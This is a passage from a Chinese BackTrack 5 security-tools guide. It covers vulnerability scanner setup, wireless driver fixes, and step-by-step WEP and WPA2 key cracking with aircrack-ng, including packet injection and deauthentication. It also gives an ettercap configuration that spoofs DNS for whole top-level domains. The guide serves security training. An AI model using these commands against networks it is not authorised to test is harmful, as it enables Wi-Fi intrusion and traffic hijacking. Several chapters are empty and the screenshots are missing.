这是一个非常可靠而且快速的思科路由器 telnet 和 enable 默认密码扫描器,可以批量扫描。
4. Cisco password scanner
5. Copy router config
6. Merge router config
第2节. Vulnerability Scanners 漏洞扫描工具
1. Nessus
Neuron security team【N.S.T】 第153/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Backtrack 5已经为大家安装好了 Nessus,使用之前先要注册 Nessus,到 Nessus 申请一个 HOME
feed,也就是免费版的序列号,你会在邮箱收到序列号。
Neuron security team【N.S.T】 第154/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
使用一下目录注册,这注册需要更新插件,会有点慢。
root@bt:~# /opt/nessus/bin/nessus-fetch --register M4D0-EWWQ-1EZU-3KSN
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.
添加 Nessus 用户:
root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : carlos
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that carlos has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login : carlos
Password : ***********
This user will have 'admin' privileges within the Nessus server
Neuron security team【N.S.T】 第155/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Rules :
Is that ok ? (y/n) [y]
User added
启动 Nessus 服务,然后使用浏览器访问 https://localhost:8834/ ,使用你上面添加的用户来登
录,就可以开始扫描漏洞了:
root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .
Neuron security team【N.S.T】 第156/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
2. OpenVas
安装 OpenVAS
root@bt:~#apt-get update
root@bt:~#apt-get install openvas
Location of OpenVAS menu entries
Once openvas has been installed you will find all the of menu entries in this location.
Neuron security team【N.S.T】 第157/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Openvas check setup
openvas-check-setup is a very useful tool, here it is showing how it can help diagnose problems and
give advice on how to fix them.
Setting up OpenVAS
Step 1
Neuron security team【N.S.T】 第158/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
From the menu, select Openvas Adduser and follow instructions.
Note that you can use any username you like but in this case I have just used root. I have left it at the
default of password authentication as I am going to be using this on a local machine and to save having
to worry about the users having certs to worry about, but this is entirely up to you. You cannot have an
empty password so I have used toor in this case. For the rules applied to this user I have left them
blank by pressing ctrl-d This means that this user will be able to perform any tasks without any re-
strictions.
Step 2
From the menu, select Openvas mkcert and follow instructions.
Here we create the SSL cert This is used if you decided to use cert instead of pass when you created
the user, but you are required to create it anyway even if you decide not to use certs.
Step 3
At this point we need to get the latest set of nvt's. These are what the scanner uses to detect the vul-
nerabilities in what you are scanning. Please note you will need to do this quite regularly, and the first
time you do it could take a while depending on the speed of your computer and internet.
Neuron security team【N.S.T】 第159/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
So select OpenVAS NVT Sync from the menu
Step 4
Start Openvas scanner
Now we are ready to start the scanner
This WILL take a while the first time you start it as it checks and loads the new NVT's you have down-
loaded in the previous step.
Note the time in the corner ! This was in a VM so it should be much quicker for you.
Subsequent starts will be quick unless you have not updated in quite some time
Please remember that the scanner runs as a daemon in the background and will keep running until you
reboot or stop it with the menu entry provided.
Step 5
Setting up openvas manager
First thing we need to do is make a client cert for Openvas manager, This is done by running the follow-
ing command
openvas-mkcert-client -n om -i
Neuron security team【N.S.T】 第160/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
now we need to rebuild the database as it is now out of date with the added nvt's and we would other-
wise get errors about the database. You should do this each time you update the NVT's. This is done
with a simple command
openvasmd --rebuild
This process will only take a few seconds
Step 6
Setting up Openvas Administrator
We need to create an administrative user that we will be using to perform all of our vulnerability asses-
ments. This is done by running the following command
openvasad -c 'add_user' -n openvasadmin -r Admin
openvasadmin is the username I have chosen to become this user, you however can substitute that
with something better suited to you if you so choose. Make sure you can remember this username and
associated password as you WILL need it when running openvas.
root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin
Enter password:
ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will
have no restrictions.
ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully
created.
root@bt:~#
Neuron security team【N.S.T】 第161/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Step 7
Now we need to start Openvas Manager
This runs as a daemon in the background. As I am running everything from my local machine I will be
using localhost to listen on and in this case the default port. This is done by running the following com-
mand.
openvasmd -p 9390 -a 127.0.0.1
Step 8
Now we need to start Openvas Administrator
This also runs as a daemon in the background. As I am running everything from my local machine I will
be using localhost to listen on and in this case the default port. This is done by running the following
command.
openvasad -a 127.0.0.1 -p 9393
Step 9
Now we need to start Greenbone security Assistant
This again runs as a daemon in the background. As I am running everything from my local machine I
will be using localhost to listen on and in this case the default port. This is done by running the following
command.
gsad --http-only --listen=127.0.0.1 -p 9392
More info on the above commands and other options can be found by running their associated menu
entry and by looking at the man pages. As all three of these run as a daemon and will continue running
until you shutdown you computer, I have provided menu entries for you so as you can stop them when
you no longer need them.
The output of running the previous three commands can be seen below.
root@bt:~# openvasmd -p 9390 -a 127.0.0.1
root@bt:~# openvasad -a 127.0.0.1 -p 9393
root@bt:~# gsad --http-only --listen=127.0.0.1 -p 9392
root@bt:~#
At this point your installation is essentially complete, but as we have got this far we may as well contin-
ue to make sure everything is working as expected.
OpenVAS user interfaces
Neuron security team【N.S.T】 第162/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Greenbone security desktop
Now we need to start an application to enable you to communicate with the scanner and other dae-
mons.
The first of these choices is greenbone security desktop
Start this from the menu item and fill in the credentials and details we created earlier, then click the log-
in button.
Once logged in you can use this as your scanning interface, or use the next choice of you prefer.
Web interface
This next method is via a web interface
Open your favorite browser and enter the following address
127.0.0.1:9392
You will then be presented with a login page. login with the credentials we created earlier.
Neuron security team【N.S.T】 第163/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Once you have logged in, you will notice that your CPU usage will hit the roof, don't worry, this will re-
turn to normal in short while.
Here you can perform and setup all of your scanning tasks. It is a good idea to set NoScript to Tempo-
rarily allow 127.0.0.1 or you may get unexpected results.
There is much more to OpenVAS than I have included here, but this is only intended to get you up and
running quickly. Scans and more advanced setups are beyond the scope of this simple tutorial. Don't
forget about some of the other parts to openvas contained within the menu that I have not covered here
and also the man pages.
Once you have completed the setup process
Starting OpenVAS with greenbone security desktop as the scanning interface
From the menu select
Openvas NVT sync
Start Openvas scanner
then in a terminal window
Neuron security team【N.S.T】 第164/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Then from the menu
Start Greenbone Security Desktop
and login
You are now ready to setup your scanning tasks.
Starting OpenVAS with a web browser as the scanning interface
From the menu select
Openvas NVT sync
Start Openvas scanner
then in a terminal window
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Then open your browser to the address
http://127.0.0.1:9392
Login.
You are now ready to setup your scanning tasks.
第四章. Exploitation Tools 漏洞利用工具
第一节. Network exploitation tools
关于 Metasploit Framework 的内容请看《Metasploit 中文指南》,或者参加我们提供的
专项技术培训。
Neuron security team【N.S.T】 第165/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. Social engineering tools
Social Engineer Toolkit:SET 是 David Kennedy (ReL1K) 使用 python 编写设计的社
会工程学工具,用于各种网络钓鱼欺骗攻击,都搭配其他漏洞一起利用效果更好。
该工具集成了多种有用的社会工程学攻击工具在一个统一的简单界面上。SET 的主要目
的是对各种社会工程攻击工具实现自动化利用和改进利用工具。不论目标系统有没有漏洞,
社会工程学都是一个比较有效的攻击手段,但实际上平时很少人使用它。
关于 Social Engineer Toolkit 的详细内容请参加我们提供的专项技术培训。
第五章. 无线安全工具
搞无线密码的破解,可以完全在 backtrack系统下面做就行了,因为在 backtrack 5中包含了最新的
2.6.38内核无线驱动程序,以及一些外部的驱动程序,这可以为各种无线攻击提供最大的灵活性,虽然
这些驱动程序可能有小部分重叠。一般来说所有旧的 IEEE驱动程序都会被列入黑名单,如果你想使用它
们就需要手动加载。
所以说根本没必要什么奶瓶什么的,因为傻瓜化的工具只会让你更加傻瓜,希望无线破解能给你带
来乐趣,同时也能给你带来知识。总体上来说目前的无线网络加密大多还是 WEP、WPA和 WPA2。下面就一
一做一下介绍。
第一节. 网卡推荐
要进行无线密码的破解,首先要选择一款合适的网卡,以下是经过 backtrack官方测试的。如果对
你的网卡有什么疑问,可以尝试把网卡插入到电脑中然后启动 backtrack系统,再运行 dmesg 命令,一
般都会找到网卡的问题所在。backtrack 5目前能够良好支持的网卡列表:
AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers
AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers
BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well
Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers
Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers
ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers
Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers
Ubiquiti SRC - using the mac80211 ath9k drivers
Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers
Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the
mac80211 ath9k drivers
Neuron security team【N.S.T】 第166/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Netgear wg111v2 - using the mac80211 rtl8187 drivers
ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers
Intel 4956/5xxx - using the iwlagn drivers
能够工作但不能注入的网卡:
Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)
Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)
不能正常工作的网卡:
D-Link DWL-122 - using the mac80211 prism2_usb drivers
Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers
AWUS051NH
第二节. dmesg 命令介绍
dmesg显示内核环缓冲区(kernel-ring buffer)的信息,内核将各种消息存放在这里。在
backtrack系统引导时,内核将与硬件和模块初始化相关的信息填到这个缓冲区中。内核环缓冲区中的消
息对于诊断系统问题 通常非常有用。
在运行 dmesg时,它显示大量信息。通常通过 less或 grep 使用管道查看 dmesg的输出,这样可以
更容易找到待查信息。例如,如果发现硬盘性能低下,可以使用 dmesg来检查它们是否运行在 DMA模
式:
$ dmesg | grep DMA
...
ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:DMA
ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:DMA
...
上面几行可以说明每个 IDE 设备正在什么模式下运行。如果以太网连接出现问题,那么可以在 dmesg
日志中搜索 eth:
$ dmesg | grep eth
forcedeth.c: Reverse Engineered nForce
ethernet driver. Version 0.49.
eth0: forcedeth.c: subsystem: 0147b:1c00
bound to 0000:00:04.0
eth0: no IPv6 routers present
如果一切正常,那么 dmesg 显示每个网卡的硬件配置信息。如果某项系统服务未能得到正确的配
置,dmesg日志很快就填满错误消息,这是诊断故障的良好起点。
第三节. 网卡选择
如果你的 backtrack系统是自己安装在电脑上的话,backtrack 就可以自动识别无线网卡。另外如果
你是在虚拟机中使用 backtrack系统,还需要把无线网卡载入到虚拟机中。如下,我这里是一的是
VMware Workstation 8。
Neuron security team【N.S.T】 第167/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
但很多笔记本电脑自带的无线网卡都不支持破解,所以还是需要另外购买一个 backtrack 支持的无
线网卡。我用的是 Realtek RTL8187 Wireless 802.11b/g 54Mbps USB 2.0 Network Adapter,这个网卡
我使用很久了,一直都还不错。
第四节. 解决 rt2800usb 驱动问题
目前有一些如 AWUS036NH 和 AWUS036NEH ALFAs 使用 rt2800usb 驱动的网卡不能正常进行破解,我
们可以自己去下载最新的 compat-wireless驱动,自己手动来编译和安装它,一般就能解决了。
root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd/usr/src/
root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-
wireless-2011-07-14.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
root@bt:~# make
root@bt:~# make install
root@bt:~# reboot
第五节. rtl8187驱动
这个驱动程序被认为是最稳定的,支持大多数 aircrack- ng 的攻击工作,也是默认加载的驱
动。
手动加载驱动程序
root@bt:~# modprobe rtl8187
Neuron security team【N.S.T】 第168/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
手动卸载驱动程序
root@bt:~# rmmod rtl8187
手动卸载所有的 mac80211 堆栈
root@bt:~# rmmod mac80211
root@bt:~# rmmod cfg80211
root@bt:~# rmmod rfkill
SIOCSIFFLAGS 未知的错误132,在 VMware 虚拟机环境中,rtl8187这个驱动程序偶尔会自动关闭,往
往造成一些错误,如下:
"rtl8187: wireless radio switch turned off",
"ioctl(SIOCSIFFLAGS) failed: Unknown error 132"
"rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132"
如果你也遇到这些错误,就把你的 USB wireless 网卡插入到电脑中,等等几秒中,然后在
backtrack系统中运行“dmesg| tail -20”。
root@bt:~# dmesg |tail -20
lo: Disabled Privacy Extensions
eth0: no IPv6 routers present
usb 1-1: new high speed USB device using ehci_hcd and address 2
cfg80211: Calling CRDA to update world regulatory domain
cfg80211: World regulatory domain updated:
(start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
(2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
(2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
(2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
(5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
(5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
phy0: Selected rate control algorithm 'minstrel'
phy0: hwaddr 00:c0:ca:38:ab:9d, RTL8187vB (default) V1 + rtl8225z2, rfkill
mask 2
rtl8187: Customer ID is 0xFF
Registered led device: rtl8187-phy0::radio
Registered led device: rtl8187-phy0::tx
Registered led device: rtl8187-phy0::rx
rtl8187: wireless switch is on
usbcore: registered new interface driver rtl8187
rtl8187: wireless radio switch turned off
root@bt:~#
请注意 rfkill 已禁用无线网卡,这就是问题所在。 使用下面的命令强行进入启用状态,
现在这网卡应该工作正常了,不过你在每一次插入网卡的时候都需要执行一次。
root@bt:~# rmmod rtl8187
root@bt:~# rfkill block all
root@bt:~# rfkill unblock all
root@bt:~# modprobe rtl8187
root@bt:~# rfkill unblock all
Neuron security team【N.S.T】 第169/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
root@bt:~# ifconfig wlan0 up
第六节. r8187驱动
如果由于某种原因,RTL8187驱动程序无法正常工作,您可以使用 IEEE r8187旧的驱动程序来代替。
首先卸载 mac80211 rtl8187驱动,如果它已经加载了:
root@bt:~# rmmod rtl8187
root@bt:~# rmmod mac80211
root@bt:~# rmmod cfg80211
Loot@bt:~# rmmod rfkill
载入 IEEE r8187驱动:
root@bt:~# modprobe r8187
第七节. compat wireless 驱动
随着 Linux 的无线驱动程序的成熟,越来越多的无线芯片组被添加到了兼容性列表中,而且 compat-
wireless 驱动程序一直在不断更新,可能有一些新功能是当前 backtrack 系统里面没有的,或者
backtrack 中没有合适的内核驱动程序程序为你工作,您可能要考虑使用最新版本的 compat-wireless 驱
动。下面以2010-11-07 compat-wireless驱动为例子,来修改驱动,加上 backtrack的无线注入补丁。
cd /usr/src/
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-
11-07.tar.bz2
tar jxpf compat-wireless-*
wget http://www.backtrack-linux.org/patches/wireless-patches-2.6.35.8.tar.gz
tar xpf wireless-patches-2.6.35.8.tar.gz
cd compat-wireless-*
应用无线注入补丁:
patch -p1 < ../wireless-patches/404-ath_regd_optional.patch
patch -p1 < ../wireless-patches/ar9170_regdomain_override.patch
patch -p1 < ../wireless-patches/ath.patch
patch -p1 < ../wireless-patches/ath5k_regdomain_override.patch
patch -p0 < ../wireless-patches/ath9k_injection_fix.patch
patch -p1 < ../wireless-patches/channel-negative-one-maxim.patch
patch -p1 < ../wireless-patches/mac80211_2.6.32.2-wl_frag+ack_radiotap.patch
patch -p1 < ../wireless-patches/rtl8187-mac80211-injection-speed-2.6.30-
rc3.patch
patch -p0 < ../wireless-patches/zd1211rw-inject+dbi-fix-2.6.26.patch
patch -p0 < ../wireless-patches/zd1211rw.patch
在这里你可以决定编译整个 compat-wireless驱动程序,或只是一个单一的驱动程序。如果你知道
你需要的驱动程序,第二种选择是最好的,如果你不在“driver select”的脚本中输入特定的驱动程
序,那么所有的驱动都将被编译。
Neuron security team【N.S.T】 第170/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
./scripts/driver-select {required driver} # use this command to select a single
driver to compile, rather than the whole package.
编译和安装驱动程序:
make
make install
make wlunload
第八节. WEP 密码破解
wep的破解要点是要抓到足够多的正常客户端和 AP交互的 IVS数据包。
ifconfig -a 查看所有的网卡
ifconfig wlan0 up 激活无线网卡
airmon-ng start wlan0 设置无线网卡模式
airodump-ng mon0 查看无线网络信息
airodump-ng --ivs -w akast -c 6 mon0 抓包
aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 mon0 ARP request
攻击
aircrack-ng akast*.ivs 开始破解
查看网卡
Neuron security team【N.S.T】 第171/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
查看无线网卡
设置无线网卡为混杂模式
Neuron security team【N.S.T】 第172/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
设置无线网卡为混杂模式后可以看到 mon0
使用 mon0开始抓包,要有客户端的才能破解
Neuron security team【N.S.T】 第173/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
进行注入,促进目标的发包量,加快抓包速度
可以在当前目录下看到抓取的数据包
Neuron security team【N.S.T】 第174/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
在破解的时候可能会看到多个目标 AP,选择合适的目标网络开始破解
Neuron security team【N.S.T】 第175/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
破解成功,密码为:12345
第九节. WPA 密码破解(WPA TKIP PSK)
WPA和 WPA2的破解要点都是要抓到正常客户端和 AP的握手数据包。
和 WPA 2 密码破解(WPA CCMP PSK)一样过程。
Neuron security team【N.S.T】 第176/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十节. WPA 2 密码破解(WPA CCMP PSK)
ifconfig -a 查看所有的网卡
ifconfig wlan0 up 激活无线网卡
airmon-ng start wlan0 设置无线网卡模式
airodump-ng mon0 查看无线网络信息
airodump-ng -w akast -c 6 mon0 抓包
aireplay-ng -0 1 -a AP的 mac -c 客户端的 mac mon0 进行 Deauth攻击获取 handshake
aircrack-ng -w 密码字典 akast*.cap 开始破解
backtrack自带的密码列表:/pentest/wireless/aircrack-ng/test/password.lst
backtrack 自带的一些密码字典1
backtrack 自带的一些密码字典
Neuron security team【N.S.T】 第177/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
2
开始注入
抓到 WPA
handshake
Neuron security team【N.S.T】 第178/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
选择要破解的网络,就是有 handshake 的网络,使用密码字典破解,这里使用的是 backtrack 自带
的密码字典。
成功破解出密码
Neuron security team【N.S.T】 第179/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第六章. Privilege Escalation 权限提升
第1节. Sniffer
1. ettercap
nano /usr/share/ettercap/etter.dns
在 etter.dns 文件后面加上:
*.com A 192.168.1.210
*.net A 192.168.1.210
*.cn A 192.168.1.210
*.org A 192.168.1.210
*.edu A 192.168.1.210
*.hk A 192.168.1.210
ctrl+o:保存配置文件
ctrl+x:退出编辑
ettercap -T -q -i eth1 -P dns_spoof
-T 字符界面,text
-q 指定 quiet 模式,不会显示繁琐的信息处理
-i 指定网卡
-P 指定插件,如 dns_spoof。
Neuron security team【N.S.T】 第180/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第181/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第182/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第2节. BackTrack 启用 Cuda
BackTrack includes many tools which utilize the power of graphics cards to greatly improve
performance. This section will help you get your environment set up to use these tools and also to
set up a development environment to make your own tools
Check http://en.wikipedia.org/wiki/CUDA to see if your video card is capable of running CUDA
applications
Installing the Nvidia Drivers
Installing the driver is now easier than ever. We use the installer from the nvidia web site and do not
alter the install in any way. This means no matter which kernel version you are running on
Neuron security team【N.S.T】 第183/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
BackTrack the nvidia-driver package should work
Note: Be sure to log out of X before installing the driver or it will fail
root@bt:~# apt-get install nvidia-driver
Simply follow the prompts and choose the defaults an
d you should be fine
Since every system is different there are 2 ways to get your xorg.conf working on BackTrack.
Method 1: The installer attempts to do this method but in some cases its needed to do it manually.
Log out of the X server
root@bt:~# Xorg -configure
root@bt:~# cp /root/xorg.conf.new /etc/X11/xorg.conf
root@bt:~# startx
Method 2: Nvidia bundles a config tool with their install which may work better for you that the
Xorg tools Log out of the X server
root@bt:~# nvidia-xconfig
root@bt:~# startx
Installing the CUDA Toolkit
The toolkit contains the nvcc compiler and all the libraries needed to build any GPU based
applications from source. The toolkit is also needed if you are planning on developing any of your
own applications.
root@bt:~# apt-get install cuda-toolkit
The default install is /opt/cuda
Note: The toolkit is designed to be installed as root. If you want to install it as another user you will
need to add the following lines to the users .bashrc file
PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib
export PATH
export LD_LIBRARY_PATH
Installing the Nvidia SDK
We no longer package the cuda code samples in our repositories due to the size the package
has become. The code samples are extremely useful though if you are interested in cuda de-
velopment. Getting it installed on BackTrack is fairly simple.
root@bt:~# wget
http://developer.download.nvidia.com/compute/cuda/3_1/sdk/gpucomputingsdk_3.1_linux.run
root@bt:~# chmod 755 gpucomputingsdk_3.1_linux.run
root@bt:~# ./gpucomputingsdk_3.1_linux.run
The only thing I change aside from the default choices is the place where the NVIDIA_SDK is
installed. On BackTrack we install to /opt so since I like to keep my stuff in the same
Neuron security team【N.S.T】 第184/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
place I instruct the installer to install to /opt/cuda/ so that my code samples are inside
my cuda directory
Getting up and running with Pyrit
Pyrit is included in the BackTrack iso but in order to use it with cuda you will need to
install the cuda kernel module. This is part of the cpyrit package. Installation is fairly
straight forward:
root@bt:~# apt-get install cpyrit-cuda
You can check if your GPU is being recognized with the following command:
root@bt:~# pyrit list_cores
Pyrit 0.3.1-dev (svn r279) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
The following cores seem available...
#1: 'CUDA-Device #1 'GeForce GTX 295
#2: 'CUDA-Device #2 'GeForce GTX 295
#3: 'CUDA-Device #3 'GeForce GTX 295
#4: 'CUDA-Device #4 'GeForce GTX 295
#5: 'CUDA-Device #5 'GeForce GTX 295
#6: 'CUDA-Device #6 'GeForce GTX 295
#7: 'CUDA-Device #7 'GeForce GTX 295
#8: 'CUDA-Device #8 'GeForce GTX 295
You can then run a benchmark to see how many keys per second your system in capable of:
root@bt:~# pyrit benchmark
Pyrit 0.3.1-dev (svn r279) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (97384.8 PMKs/s)... |
Computed 97384.83 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 295: 11520.5 PMKs/s (RTT 2.9) #2: 'CUDA-Device #2 'GeForce GTX 295: 11274.3 PMKs/s (RTT 2.9) #3: 'CUDA-Device #3 'GeForce GTX 295: 10439.3 PMKs/s (RTT 2.9) #4: 'CUDA-Device #4 'GeForce GTX 295: 11095.7 PMKs/s (RTT 2.9) #5: 'CUDA-Device #5 'GeForce GTX 295: 10564.8 PMKs/s (RTT 2.6) #6: 'CUDA-Device #6 'GeForce GTX 295: 10533.7 PMKs/s (RTT 2.9) #7: 'CUDA-Device #7 'GeForce GTX 295: 10414.8 PMKs/s (RTT 2.6) #8: 'CUDA-Device #8 'GeForce GTX 295: 11333.7 PMKs/s (RTT 2.9)
Add CUDA syntax highlighting to Vim
I like to use Vim for coding so here is how to add CUDA syntax highlighting to BackTrack
First we need to install vim-full:
root@bt:~# apt-get install vim-full
Neuron security team【N.S.T】 第185/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Then grab the syntax file:
root@bt:~# cd /usr/share/vim/vim71/syntax/
root@bt:/usr/share/vim/vim71/syntax# wget http://www.BackTrack-linux.org/patches/cu.vim.txt
root@bt:/usr/share/vim/vim71/syntax# mv cu.vim.txt cu.vim
Next change into your root directory (or whichever user you are using):
root@bt:~# touch .vimrc
root@bt:~# vi .vimrc
Add the following lines:
au BufNewFile,BufRead *.cu set ft=cu
syntax on
Now your vi should be set up for CUDA syntax highlighting
第七章. Maintaining Access 维护访问工具
Neuron security team【N.S.T】 第186/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第八章. Reverse engineering 逆向工程工具
第九章. RFID 工具
Neuron security team【N.S.T】 第187/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十章. Stress Testing 压力测试工具
第十一章. Forensics 取证工具
第1节. 取证应用
从 backtrack4开始增加了用于取证的启动项,但是你知道这是做什么用的吗?认真看看我们
的介绍吧。
Neuron security team【N.S.T】 第188/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
LiveCD 和取证
For a long time now, Linux Live CDs have been very useful for forensic acquisition purposes
in instances where for one reason or another you can’t utilize a hardware write blocker.
When configured not to automount drives, and a little bit of know how, a Linux Live CD can
be a wonderful software write blocker. For a Linux live CD to be considered for this pur-
pose however, it is of the utmost importance that the use of the live CD in no way alters
any data in any manner. That's the main reason that BackTrack was rolled out in the past,
BackTrack would automount available drives and utilize swap partitions where available, by
doing this BackTrack could have caused all sorts of havoc, changing last mount times, al-
tering data on disk, and so on. But since BackTrack 4 and now BackTrack 5 that's not the
case anymore.
How?
So, lets have the scoop. Forensic people are often detail oriented and very conservative,
so how do we know it is safe to use? Well, first off the BackTrack 5 Live CD is based off
of Casper, and contains no filesystem automount scripts at all. The system initialization
scripts have been altered in the forensic boot mode so that BackTrack 5 will not look for
or make use of any swap partitions which are contained on the system. All those scripts
have been removed from the system.
Verification:
To test this functionality, we have tested this boot mode with multiple hardware configura-
tions. For each test, we took a before MD5 snapshot of the system disks, booted BackTrack5
in forensic boot mode, verified no file systems were mounted and swap was not in use, did a
number of activities on the system, then shut the system back down and took an after MD5
Neuron security team【N.S.T】 第189/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
snapshot. In comparing the two MD5 snapshots, in every case they were a match, demonstrat-
ing no changes on the disks has been made.
Usage:
When you utilize Backtrack for forensics purposes, be sure you don’t let it go through an
unattended boot. Default boot for Backtrack is standard boot mode, which will use swap par-
titions if they are present. There is a nice long delay however, so you will have plenty of
time to select the proper boot mode. Also, please remember, this is a Linux distribution.
It is highly suggested that you become familiar with Linux before use this, or any other
Linux Live CD for any forensic purpose. Also, be sure to check out the additional forensic
tools added to Backtrack 5. We have concentrated on the addition of imaging and triage
tools, but if you find that one of your favorite utilities is not in place please let us
know so we can look into having it added.
Antivirus forensics tools
Digital anti forensics
Digital forensics
Forensics analysis tools
Forensics carving tools
Forensics hashing tools
Forensics imaging tools
Forensics suites
Network forensics
Password forensics tools
PDF forensics tools
RAM forensics tools
反病毒取证工具
数字反取证
数字取证
取证分析工具
取证恢复工具
取证散列工具
取证镜像工具
取证工具套装
网络取证工具
密码取证工具
PDF 取证工具
RAM 取证工具
第十二章. Reporting Tools 报告工具
打工仔工程师用的,you know。
Neuron security team【N.S.T】 第190/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十三章. Services 各种服务
第一节. 启动 SSHD 服务
启动了 backtrack 的 SSHD 服务,我们就可以通过 SSH 来远程连接 backtrack 系统,或者
通过 cuteftp 来给 backtrack 传输文件。
